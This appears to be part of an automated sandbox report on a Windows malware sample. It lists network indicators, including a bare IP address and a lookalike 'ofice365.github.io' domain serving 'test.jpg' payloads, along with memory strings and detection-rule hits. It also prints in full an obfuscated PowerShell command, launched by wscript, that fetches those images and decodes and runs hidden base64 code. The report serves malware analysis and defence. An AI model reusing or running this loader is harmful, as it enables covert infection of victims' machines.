            Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
            Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
            Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
            Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
            Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113 HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /1/test.jpg HTTP/1.1Host: ofice365.github.ioConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /public_files/Sjofbrd.txt HTTP/1.1Host: 62.60.226.64Connection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: bitbucket.org
            Source: global trafficDNS traffic detected: DNS query: ofice365.github.io
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 10 Feb 2025 18:58:19 GMTContent-Type: text/html; charset=utf-8Content-Length: 15184Server: AtlassianEdgeVary: authorization, cookie, user-context, Accept-Language, Origin, Accept-EncodingX-Used-Mesh: FalseContent-Language: enX-View-Name: bitbucket.apps.downloads.views.download_fileEtag: "c6edb77bd42d52ee6aec670f4d835019"X-Dc-Location: Micros-3X-Served-By: 40e2430b0f95X-Version: 7e618548327dX-Static-Version: 7e618548327dX-Request-Count: 674X-Render-Time: 0.05995440483093262X-B3-Traceid: 09786b93329a430081033b8b2c32aec0X-B3-Spanid: 7dfbba73e1beaa74X-Frame-Options: SAMEORIGINContent-Security-Policy: style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net app.pendo.io cdn.pendo.io pendo-static-6291417196199936.storage.googleapis.com https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; object-src 'none'; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net app.pendo.io cdn.pendo.io data.pendo.io pendo-io-static.storage.googleapis.com pendo-static-6291417196199936.storage.googleapis.com https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ 'nonce-PYFQ/ySadRRTopb5L56fqw=='; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpuser.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statu
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F038000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000005.00000002.2582750813.00000260874C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279450210.000002031EE11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F038000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279450210.000002031F212000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://admin.atlassian.com
            Source: powershell.exe, 00000005.00000002.2582750813.0000026087457000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2582750813.0000026087494000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279450210.000002031EE11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279450210.000002031F212000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.bitbucket.org
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279450210.000002031F212000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://atlassianblog.wpuser.com/wp-json/wp/v2/posts?tags=11972&context=embed&per_page=6&orderby=d
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/7e618548327d/
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/7e618548327d/css/entry/ad
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/7e618548327d/css/entry/ap
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/7e618548327d/css/entry/ve
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/7e618548327d/css/themes/a
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F212000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/7e618548327d/dist/webpack
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/7e618548327d/img/default_
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/7e618548327d/img/logos/bi
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279450210.000002031F212000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/7e618548327d/jsi18n/en/dj
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279450210.000002031F212000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org
            Source: powershell.exe, 00000005.00000002.2582750813.00000260879DD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2276617831.000002031D3DA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279450210.000002031F038000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2276617831.000002031D36F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279450210.000002031EE11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2276617831.000002031D350000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2278924771.000002031D630000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279013760.000002031D664000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279450210.000002031F212000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/gateway/api/emoji/
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279450210.000002031F212000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.status.atlassian.com/
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bqlf8qjztdtr.statuspage.io
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F1F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F038000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F212000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://id.atlassian.com/login
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://id.atlassian.com/login?prompt=login&amp;continue=https%3A%2F%2Fbitbucket.org%2Fccccccccccccn
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F212000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://id.atlassian.com/logout
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F212000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://id.atlassian.com/manage-profile/
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://id.atlassian.com/profile/rest/profile&quot;
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ofice365.github.io
            Source: powershell.exe, 00000005.00000002.2582750813.00000260879DD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2276617831.000002031D3DA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279450210.000002031F038000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2276617831.000002031D36F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279450210.000002031EE11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2276617831.000002031D350000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2278924771.000002031D630000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279013760.000002031D664000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ofice365.github.io/1/test.jpg
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279450210.000002031F212000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://preferences.atlassian.com
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F1F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F1F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F1F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279450210.000002031F212000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.atlassian.com/try/cloud/signup?bundle=bitbucket
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
            Source: unknownHTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.6:49709 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.199.108.153:443 -> 192.168.2.6:49711 version: TLS 1.2

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: Process Memory Space: powershell.exe PID: 1352, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 5388, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Windows Scripting host queries suspicious COM object (likely to drop second stage)
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Network Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{093FF999-1EA0-4079-9525-9614C3504B74}Jump to behavior
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Wscript starts Powershell (via cmd or directly)
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@C
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeCode function: 0_2_00007FF6A1D82C54 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,0_2_00007FF6A1D82C54
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeCode function: 0_2_00007FF6A1D81C0C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,0_2_00007FF6A1D81C0C
